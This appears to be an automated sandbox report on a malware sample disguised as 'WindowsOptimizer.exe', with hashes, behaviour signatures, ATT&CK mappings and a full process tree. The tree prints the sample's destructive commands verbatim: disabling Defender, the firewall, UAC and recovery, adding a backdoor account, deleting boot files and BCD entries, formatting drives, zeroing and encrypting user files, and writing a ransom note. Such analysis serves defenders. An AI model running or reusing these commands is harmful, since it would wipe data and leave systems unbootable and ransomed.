Analysis
-
max time kernel
2s -
max time network
3s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09-11-2024 21:27
Static task
static1
Behavioral task
behavioral1
Sample
WindowsOptimizer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
WindowsOptimizer.exe
Resource
win10v2004-20241007-en
General
-
Target
WindowsOptimizer.exe
-
Size
254KB
-
MD5
5aaa262b518a3417e028e001152c9236
-
SHA1
6d1cda51302d760509822b502a8f980537d17cb0
-
SHA256
d4682419f76d71b863481d6e17ae0ed0cbbf06581aa2480ed304c66dd9072b5b
-
SHA512
722d7c1a4f87c10f34e6500d1712414f159da8ca9cb02b0b9f44f8df717345cbff473cfe5c486837ad6c9e2487677c7e22c2974f7c36c320a83ffc16812ffbca
-
SSDEEP
3072://w6PYqco8r88P7kHLWwZSO1qPZg6QpakmTjG0efuiWFExDYp1:1PYM8orWwgBeVuNpp1
Malware Config
Signatures
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Modifies boot configuration data using bcdedit 1 TTPs 5 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 2944 bcdedit.exe 2740 bcdedit.exe 2652 bcdedit.exe 2972 bcdedit.exe 2344 bcdedit.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 2748 netsh.exe -
Enumerates connected drives 3 TTPs 3 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
mountvol.exeformat.comformat.comdescription ioc process File opened (read-only) \??\X: mountvol.exe File opened (read-only) \??\D: format.com File opened (read-only) \??\E: format.com -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
WindowsOptimizer.exedescription ioc process File opened for modification \??\PhysicalDrive0 WindowsOptimizer.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 3004 sc.exe 2728 sc.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Modifies registry key 1 TTPs 3 IoCs
-
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
WindowsOptimizer.exedescription pid process Token: SeShutdownPrivilege 2088 WindowsOptimizer.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
efsui.exepid process 2852 efsui.exe 2852 efsui.exe 2852 efsui.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
efsui.exepid process 2852 efsui.exe 2852 efsui.exe 2852 efsui.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WindowsOptimizer.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2088 wrote to memory of 1812 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 1812 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 1812 2088 WindowsOptimizer.exe cmd.exe PID 1812 wrote to memory of 1772 1812 cmd.exe reg.exe PID 1812 wrote to memory of 1772 1812 cmd.exe reg.exe PID 1812 wrote to memory of 1772 1812 cmd.exe reg.exe PID 2088 wrote to memory of 2564 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2564 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2564 2088 WindowsOptimizer.exe cmd.exe PID 2564 wrote to memory of 2748 2564 cmd.exe netsh.exe PID 2564 wrote to memory of 2748 2564 cmd.exe netsh.exe PID 2564 wrote to memory of 2748 2564 cmd.exe netsh.exe PID 2088 wrote to memory of 2848 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2848 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2848 2088 WindowsOptimizer.exe cmd.exe PID 2848 wrote to memory of 2808 2848 cmd.exe reg.exe PID 2848 wrote to memory of 2808 2848 cmd.exe reg.exe PID 2848 wrote to memory of 2808 2848 cmd.exe reg.exe PID 2088 wrote to memory of 2832 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2832 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2832 2088 WindowsOptimizer.exe cmd.exe PID 2832 wrote to memory of 3004 2832 cmd.exe sc.exe PID 2832 wrote to memory of 3004 2832 cmd.exe sc.exe PID 2832 wrote to memory of 3004 2832 cmd.exe sc.exe PID 2088 wrote to memory of 2760 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2760 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2760 2088 WindowsOptimizer.exe cmd.exe PID 2760 wrote to memory of 2728 2760 cmd.exe sc.exe PID 2760 wrote to memory of 2728 2760 cmd.exe sc.exe PID 2760 wrote to memory of 2728 2760 cmd.exe sc.exe PID 2088 wrote to memory of 2840 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2840 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2840 2088 WindowsOptimizer.exe cmd.exe PID 2840 wrote to memory of 2736 2840 cmd.exe reg.exe PID 2840 wrote to memory of 2736 2840 cmd.exe reg.exe PID 2840 wrote to memory of 2736 2840 cmd.exe reg.exe PID 2088 wrote to memory of 2264 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2264 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2264 2088 WindowsOptimizer.exe cmd.exe PID 2264 wrote to memory of 2876 2264 cmd.exe reg.exe PID 2264 wrote to memory of 2876 2264 cmd.exe reg.exe PID 2264 wrote to memory of 2876 2264 cmd.exe reg.exe PID 2088 wrote to memory of 2720 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2720 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2720 2088 WindowsOptimizer.exe cmd.exe PID 2720 wrote to memory of 2764 2720 cmd.exe reg.exe PID 2720 wrote to memory of 2764 2720 cmd.exe reg.exe PID 2720 wrote to memory of 2764 2720 cmd.exe reg.exe PID 2088 wrote to memory of 2636 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2636 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2636 2088 WindowsOptimizer.exe cmd.exe PID 2636 wrote to memory of 2856 2636 cmd.exe reg.exe PID 2636 wrote to memory of 2856 2636 cmd.exe reg.exe PID 2636 wrote to memory of 2856 2636 cmd.exe reg.exe PID 2088 wrote to memory of 2892 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2892 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 2892 2088 WindowsOptimizer.exe cmd.exe PID 2892 wrote to memory of 2944 2892 cmd.exe bcdedit.exe PID 2892 wrote to memory of 2944 2892 cmd.exe bcdedit.exe PID 2892 wrote to memory of 2944 2892 cmd.exe bcdedit.exe PID 2088 wrote to memory of 1576 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 1576 2088 WindowsOptimizer.exe cmd.exe PID 2088 wrote to memory of 1576 2088 WindowsOptimizer.exe cmd.exe PID 1576 wrote to memory of 2740 1576 cmd.exe bcdedit.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:1772
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off2⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2748 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:2808 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop wuauserv2⤵
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3004 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled2⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\sc.exesc config wuauserv start=disabled3⤵
- Launches sc.exe
PID:2728 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:2736 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f3⤵
- Disables RegEdit via registry modification
- Modifies registry key
PID:2876 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵PID:2764
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f3⤵PID:2856
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No2⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2944 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:2740 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add2⤵PID:2716
-
C:\Windows\system32\net.exenet user TrojanUser0 ComplexPass123! /add3⤵PID:2632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add4⤵PID:2204
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe2⤵PID:2656
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop2⤵PID:2600
-
C:\Windows\system32\cipher.execipher /E /A /S:C:\Users\Admin\Desktop3⤵PID:1956
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:2596
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AssertNew.cmd"3⤵PID:2680
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\BlockConfirm.mp4"3⤵PID:2472
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CheckpointCopy.vbs"3⤵PID:2196
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteMove.cab"3⤵PID:2884
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteUpdate.mpe"3⤵PID:2232
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertApprove.wvx"3⤵PID:2220
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertToStep.js"3⤵PID:2312
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CopyShow.xlsx"3⤵PID:1644
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DebugShow.ps1"3⤵PID:2888
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DisableClose.docx"3⤵PID:536
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\EnterComplete.asx"3⤵PID:2352
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ExportResume.au"3⤵PID:2780
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportConfirm.doc"3⤵PID:1912
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportExport.pot"3⤵PID:2372
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\InstallDisconnect.DVR-MS"3⤵PID:660
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinOut.cfg"3⤵PID:840
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\LimitAdd.xml"3⤵PID:2052
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeProtect.mov"3⤵PID:1508
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PingConvertTo.mp4v"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:352 -
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopUnregister.potm"3⤵PID:908
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoClose.xlsx"3⤵PID:688
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RenameSync.docx"3⤵PID:2584
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectInitialize.mov"3⤵PID:2332
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SendRevoke.vsx"3⤵PID:1048
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SetClose.AAC"3⤵PID:2456
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartUninstall.bmp"3⤵PID:2284
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepHide.mpeg"3⤵PID:2268
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopJoin.lock"3⤵PID:2248
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopRedo.vdx"3⤵PID:3008
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SuspendDebug.asp"3⤵PID:3012
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll2⤵PID:2616
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr2⤵PID:2668
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f2⤵PID:2336
-
C:\Windows\system32\bcdedit.exebcdedit /delete {bootmgr} /f3⤵
- Modifies boot configuration data using bcdedit
PID:2652 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f2⤵PID:1620
-
C:\Windows\system32\bcdedit.exebcdedit /delete {default} /f3⤵
- Modifies boot configuration data using bcdedit
PID:2972 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mountvol X: /s2⤵PID:1744
-
C:\Windows\system32\mountvol.exemountvol X: /s3⤵PID:2224
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*2⤵PID:2488
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mountvol X: /d2⤵PID:2452
-
C:\Windows\system32\mountvol.exemountvol X: /d3⤵
- Enumerates connected drives
PID:1792 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y2⤵PID:1788
-
C:\Windows\system32\format.comformat C: /fs:raw /q /y3⤵PID:2880
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y2⤵PID:1712
-
C:\Windows\system32\format.comformat D: /fs:raw /q /y3⤵
- Enumerates connected drives
PID:2144 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y2⤵PID:1280
-
C:\Windows\system32\format.comformat E: /fs:raw /q /y3⤵
- Enumerates connected drives
PID:1996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f2⤵PID:2896
-
C:\Windows\system32\bcdedit.exebcdedit /delete {current} /f3⤵
- Modifies boot configuration data using bcdedit
PID:2344 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:2176
-
C:\Windows\system32\cmd.execmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:2016
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:2252
-
C:\Windows\system32\cmd.execmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:748
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:2172
-
C:\Windows\system32\cmd.execmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:1272
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:1604
-
C:\Windows\system32\cmd.execmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:904
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:2428
-
C:\Windows\system32\cmd.execmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:2228
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt2⤵PID:2216
-
C:\Windows\system32\cmd.execmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt2⤵PID:560
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents2⤵PID:2212
-
C:\Windows\system32\cmd.execmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents2⤵PID:2528
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt2⤵PID:3028
-
C:\Windows\system32\efsui.exeefsui.exe /efs /keybackup1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2852
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
2Pre-OS Boot
1Bootkit
1